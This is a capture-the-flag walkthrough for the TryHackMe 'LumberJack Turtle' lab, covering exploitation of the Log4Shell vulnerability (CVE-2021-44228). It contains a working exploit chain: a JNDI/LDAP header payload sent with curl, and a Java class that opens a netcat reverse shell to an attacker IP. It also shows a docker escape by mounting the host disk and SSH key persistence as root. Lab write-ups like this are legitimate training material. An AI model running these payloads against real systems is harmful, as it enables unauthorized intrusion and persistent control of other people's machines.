LumberJack Turtle – Walkthrough En | TryHackMe – Write-up
No logs, no crime… so says the lumberjack.
Lumberjack turtle is a Tryhackme box and log4j is in the spotlight.
Perfect training to exploit CVE-2021-44228 vulnerability
Enumeration
Command :
nmap -T5 -sV -p- 10.10.239.165
Web enumeration
Only port 80 is open. We will enumerate the existing directories on the target with Dirb
Command :
dirb http://10.10.239.165
We have found a 1st directory, we will see if there is a second on this one.
Command :
dirb -u http://10.10.239.165/~logs
New directory found log4j. We will therefore have to exploit this flaw. Before seeing to get into it you have to see if the target is vulnerable.
This GitHub directory allows us to test if the target is vulnerable : https://github.com/fullhunt/log4j-scan
Command :
git clone https://github.com/fullhunt/log4j-scan
cd log4j-scan
pip3 install -r requirements.txt
Target scan :
python3.9 log4j-scan.py http:// 10.10.239.165/~logs/log4j
It’s vulnerable… At the same time, we suspected a little…
Little hint lost in the header...
It was well hidden, but it’s worth it. It’s in the header of the /~logs/log4j page.
In the development tools ( f12 ), we can see the hint: X-THM-HINT CVE-2021-44228 against X-Api-Version
Initial foothold - Exploitation
To exploit the flaw, there are several steps to put in place
- Setting up a server that will respond to the ldap request (LDAP Referral Server)
- creating a code shell in java
- exploit sharing via an http server
- setting up a netcat listener
- execute the malicious request.
LDAP Referral Server
You must first download this directory GitHub
Command :
git clone https://github.com/mbechler/marshalsec
cd marshalec
mvn clean package -DskipTests
Setting up the server :
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit
Creating a shellcode in java
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc 10.11.38.124 9999 -e /bin/bash");
} catch (Exception e) {
e.printStackTrace();
}
}
} 
Compilation
javac Exploit.java -source 8 -target 8
Exploit sharing via a http server
python3.9 -m http.server
Setting up a netcat listener
nc -nlvp 9999
Everything is ready !!!!
Execute the malicious request.
curl -X GET http://10.10.239.165/~logs/log4j/ -H 'X-Api-Version: ${jndi:ldap://10.11.38.124:1389/Exploit\}' Escalade de privilège
We arrive on a shell, which cannot be upgraded. In any case, we are on a root account but in a content.
Flag 1
The 1st flag is at this location: /opt/
Escape from docker
As for the Hamlet box (put the link), you have to go to /dev and see which disks are present.
Command :
cd /dev
ls -al | grep disk
Then, we have to mount xvda1.
Command :
mkdir /mnt/xvda1
mount /dev/xvda1 /mnt/xvda1
Once mounted, we have access to the entire system as root.
Flag 2
The 2nd flag is more difficult to find. It is easy to miss. You have to see the folder called «…»
Done !!!
Connection SSH - Root
It is possible to connect in ssh. Once the xvda1 volume is mounted, it is possible to add a public key in the authorized_keys file.
On Kali, you have to create a private/public key pair
Command :
ssh-keygen
Copy of the key id_rsa.pub :
echo ‘key here ‘ >> authorized_keys
#
That’s all folks
Thank you for taking the time to come to the site to read this Write-Up
I hope he has more for you and teaches you new things.
Feel free to leave a comment or share this article.
